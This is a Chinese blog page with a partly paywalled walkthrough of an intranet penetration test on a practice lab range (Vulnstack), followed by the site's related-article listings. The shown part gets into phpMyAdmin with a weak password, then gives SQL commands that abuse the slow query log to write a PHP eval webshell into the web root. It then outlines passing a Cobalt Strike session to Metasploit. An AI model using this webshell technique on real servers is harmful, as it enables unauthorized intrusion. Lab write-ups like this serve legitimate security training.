内网渗透之小试牛刀

最新推荐文章于 2022-11-12 18:45:10 发布
最新推荐文章于 2022-11-12 18:45:10 发布
阅读量2k 收藏 4
点赞数 1
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csacs/article/details/104570240
版权
本文详细介绍了内网渗透的过程,包括思路、获取权限、准备工作、内网搜集、横向渗透和拿下域控等步骤。通过判断系统、收集端口和目录信息,发现了PHPMyAdmin的弱口令,利用慢查询日志获取shell。接着使用CS与MSF配合进行提权,并进行内网信息收集,最终通过多种方法如令牌假冒、PTH攻击等成功拿下域控。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

内网渗透之小试牛刀

  • 离你最近的地方,路途最远。

文章目录

思路:

获取服务器权限->进入内网->判断是否在域中->信息收集(定位域控、域主机、域用户账号密码等)->横向移动(漏洞利用)->拿下域控。

获取权限:

靶场为http://vulnstack.qiyuanxuetang.net/vuln
直接开搞,首先判断yxcms,然后根据版本尝试一些漏洞无果,进而收集端口以及目录,发现phpmyadmin,弱口令进入
在这里插入图片描述通过慢查询日志getshell

show variables like '%slow%'; 
set GLOBAL slow_query_log=on;
set global slow_query_log_file = 'c:/phpstudy/www/1.php';
select '<?php eval($_POST[cmd]);?>' from mysql.db where sleep(10);

在这里插入图片描述 即可获取shell:
在这里插入图片描述

准备工作:

由于菜刀不好用,直接反弹cs,
在这里插入图片描述然后将cs传给msf,首先msf利用exploit/multi/handler监听,然后cs中把msf监听地址以及端口添加到listen并使用forgein进行监听,然后cs中spawn即可。

最低0.47元/天 解锁文章
【评论区抽奖】北大社将《Web安全攻防从入门到精通》送上新书热卖NO.1
hongrisec的博客
10-17 1956
还没看到《Web安全攻防从入门到精通》?那你的第一本安全书籍就交给红日吧,评论区留言,免费看!
内网渗透之PPT票据传递攻击(Pass the Ticket)
qq_53742230的博客
07-31 2095
内网渗透之票据传递攻击
WEB安全渗透课程ppt
01-04
WEB安全渗透课程ppt,cisp-pte教材,包含16个章节,涵盖日常常用漏洞解析
牛刀小试】——浅析SQL注入
Jack 架构师之路
03-12 1516
引言   SQL注入在当前编程中是非常重要的话题,在较大的Web项目中程序员都在编程的过程中避免SQL的注入,因为有很多网站信息的泄露都是因为恶意的SQL注入造成的,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.所以我们应该对SQL注入有一定的了解并且在编程的过程中有意去避免它。       SQL注入实例  首先
小试牛刀(一)
风轻云淡
09-17 1481
1、有10张饼,每天至少吃一张,问第三天吃完的概率(36/512) 思路:这里的三天吃完,是指恰巧第三天吃完;那么第一天最多吃8张,剩下两天对应的只有1种情况,第一天吃7张,剩下两天对应的有2种情况,第一天吃6张,剩下两天对应的有3种情况,同理依次类推:1+2+3+4+5+6+7+8=36。 10张饼一共有多少种吃发?可以第1天吃完,可以两天吃完,可以三天吃完......最多十天吃完。 方法...
内网渗透思路
冷风
07-09 2445
内网渗透思路1.      加固,感染系统盘之外的EXE文件保护目标。2.      上键盘记录和USB插件3. 记录目标杀软。4.      抓取HASH。5.  获取目标网络环境,工作组还是域环境。6.  搜索主机是否有网络管理软件5.  搜索主机中所有docxls ppt等关键文件,并下载。6.  对方是否使用outlook,下载PST文件并抓取密码。7.      查看对方是否连接过338
内网安全攻防渗透测试实战指南.pptx
07-01
内网安全攻防渗透测试实战指南
内网渗透
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-12 1212
渗透测试到达渗透阶段时,我们拿到了位于公网主机的权限时,并且能通过挂代理访问到处于内网的主机时。这时如果我们想要拿到内网主机的权限,那么我们就要开始进行内网渗透了。那么,内网渗透该如何开始呢?
ARP攻击与防护--小试牛刀
BIGmustang的博客
05-25 1448
大家好,作为网络人我们都知ARP协议是存在BUG的,下面我们来模拟实验攻击一番。 我们提前装备好2台虚拟机,一台win7 , IP配192.168.10.10 ,win7上运行长角牛软件,一台win10 ,IP配置192.168.10.20 。然后用ESPN模拟软件,还有咱们的 长角牛 攻击软件,然后开始行动。 在参数配置完成后,我们进行路由器的IP设置,检查联通性,具体如图所示 网关的mAC地址如下图所示 检查完毕,我们网络配置正常,下面我们在一台虚拟机上开启长角牛攻击软件 点击开始之后
wce内网渗透
03-23
用于内网渗透 抓去密码 抓到管理密码 打开内网 突破
这是一个关于内网渗透的文档
09-14
这个是属于empire内网渗透的这么一篇文档,里面感觉还不错。挺干的吧,适合小白
内网渗透讲义(1).pdf
06-30
渗透测试过程中,我们经常会遇到以下场景:某处于域中的服务器通过路由做端口映射,对外提供web服务,我们通过web脚本漏洞获得了该主机的system权限,如果甲方有进一步的内网渗透测试需求,以证明企业所面临的巨大风险,这个时候就需要做内网的域渗透
内网渗透测试技术
09-13
内网渗透技术,请勿用于非法目的,仅用于技术交流。
内网渗透常用手法.doc
07-18
内网渗透常用手法
内网渗透中的思路之一
05-01
在进行内网渗透,尤其是在比较大型的网络环境下,很可能会遇到域这样一种特殊的网络环境,而在域环境下的内网渗透又将是另外一片天 地。
互联网周刊_11年第15期(115网盘下载)
kmccbb的专栏
08-08 256
简介:去年,团购网站经历了横空出世、跑马圈地的拓展竞速过程;今年,团购网站血拼广告的同时,也在寻求新的出路,突破瓶颈。但如果大多数团购网站依旧亏本做生意,那么资金链吃紧,成本居高不下,将让团购网站进入新一轮...     网盘下载地址:  http://u.115.com/
某教程学习笔记(一):22、内网渗透
Web安全工具库
03-17 448
今天我想你了,但是这并不影响我打游戏不影响我睡觉,我只是偷偷抹了抹眼泪,感叹下最后还是没能牵住你的手。。。 ---- 网易热评 一、信息收集 主机内部收集 1、ip:ipconfig/all 2、进程收集:tasklist 3、端口:netstat -an 4、服务:services.msc 5、软件安装:查看默认安装目录 6、文件目录:查看系统的一些文件或目录 7、共享缓存:\1 会出来...
内外互通,小试牛刀
scncysyf的博客
03-31 194
如图: 配置如下: [sw1]vlan batch 6 10 20 [sw1]int vlanif 10 [sw1-Vlanif10]ip add 192.168.10.250 24 [sw1-Vlanif10]vrrp vrid 10 virtual-ip 192.168.10.254 [sw1-Vlanif10]vrrp vrid 10 priority 200 [sw1-Vlanif10]...
悬镜安全强烈推荐丨内网安全检查/渗透总结,先收藏再说
Anprou的博客
07-06 6565
浏览文章的时候,能够看到一篇干货满满的文章,实属不易,能够把内网安全渗透测试的整个阶段所涉及到的信息整理的如何全面也是值得佩服,废话不多说,直接上文章。本篇文章首发平台先知社区,如需转载,请标注来源。阅读本篇文章大约需要15分钟,建议先收藏,慢慢看。修订记录编号日期修订内容12018.5.18初稿A2B2C2A3B3C31. 内网安全检查/渗透介绍1.1 攻击思路有2种思路:攻击外网服务器,获取外...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值